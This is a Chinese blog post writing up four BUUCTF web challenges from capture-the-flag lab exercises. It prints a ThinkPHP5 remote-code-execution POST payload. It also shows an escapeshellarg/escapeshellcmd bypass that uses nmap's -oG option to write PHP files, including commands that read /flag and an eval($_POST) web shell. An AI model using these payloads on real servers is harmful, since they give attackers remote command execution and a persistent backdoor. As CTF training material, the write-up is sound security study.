Web-7(25-28)-BUUCTF平臺

本篇內容
[BJDCTF 2nd]old-hack
[BUUCTF 2018]Online Tool
[0CTF 2016]piapiapia
[ACTF2020 新生賽]Include

上一篇 | 目錄 | 下一篇

[BJDCTF 2nd]old-hack

發現是thinkphp5漏洞，使用Kali查一下漏洞利用方法：

我們查看一下最新的那個46150.txt，看看是否可以利用，在kali命令行輸入：

cat /usr/share/exploitdb/exploits/php/webapps/46150.txt

嘗試一下它給的利用姿勢：

?s=captcha

然後POST：
_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=ls -al

發現可行，嘗試換成ls /看到flag字眼，然後cat /flag拿到最終flag。

---

[BUUCTF 2018]Online Tool

訪問網址，直接出現以下代碼：

<?php
if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) {
    $_SERVER['REMOTE_ADDR'] = $_SERVER['HTTP_X_FORWARDED_FOR'];
}

if(!isset($_GET['host'])) {
    highlight_file(__FILE__);
} else {
    $host = $_GET['host'];
    $host = escapeshellarg($host);
    $host = escapeshellcmd($host);
    $sandbox = md5("glzjin". $_SERVER['REMOTE_ADDR']);
    echo 'you are in sandbox '.$sandbox;
    @mkdir($sandbox);	//創建文件夾
    chdir($sandbox);	//移到該文件夾下
    echo system("nmap -T5 -sT -Pn --host-timeout 2 -F ".$host);
}

大致就是GET一個host參數，經過escapeshellarg()和escapeshellcmd()函數處理後，用system命令來執行nmap掃描，掃描host傳入的東西。
escapeshellarg()和escapeshellcmd()函數一起使用會導致單引號逃逸，見大佬文章：談談escapeshellarg參數繞過和注入的問題。但是常見的命令注入操作如 | & 等不能用，因爲escapeshellcmd()函數對一些特殊符號會進行轉義。
其實，nmap命令可以將掃描結果寫入文件，參數如下表：

-oN				標準保存
-oX				XML保存
-oG				Grep保存
-oA				保存到所有格式
-append-output	補充保存文件

這樣，就可以構造payload了，但我都嘗試了，發現就一個-oG可用：

' <?php phpinfo();?> -oG shell.php '

經過escapeshellarg()函數處理後就是（這裏<?php phpinfo();?>直接執行了，所以不顯示）

''\'' -oG shell.php '\'''

經過escapeshellcmd()函數處理後就是

''\\'' \<\?php phpinfo\(\)\;\?\> -oG shell.php '\\'''

然後由於所有的單引號都已經配對，且\<\?php phpinfo\(\)\;\?\>寫入shell.php後就又是<?php phpinfo();?>了。

去嘗試一下，會生成一個文件夾且會進入該文件夾下：

' <?php phpinfo();?> -oG shell.php '

發現可行，那就直接改payload：

' <?php echo `ls /`;?> -oG shell.php '

查看flag：

' <?php echo `cat /flag`;?> -oG shell.php '

當然的，也可以使用菜刀連接，payload：

' <?php eval($_POST["a"]);?> -oG shell.php '

然後在根路徑下找到flag。

---

[0CTF 2016]piapiapia

這題考察反序列化逃逸，說實話有些難度，會照着WP做，但自己的見解不深，直接放大佬博客：[0CTF 2016]piapiapia(反序列化逃逸)。

---

[ACTF2020 新生賽]Include

直接點擊tips，出現如下提示：

試着用php://僞協議做做看，出現了一串base64密文：

base64解密即可拿到最終flag。

========================================================
上一篇-----------------------------------目錄 -----------------------------------下一篇
========================================================
轉載請註明出處。
本文網址：https://blog.csdn.net/hiahiachang/article/details/105437591
========================================================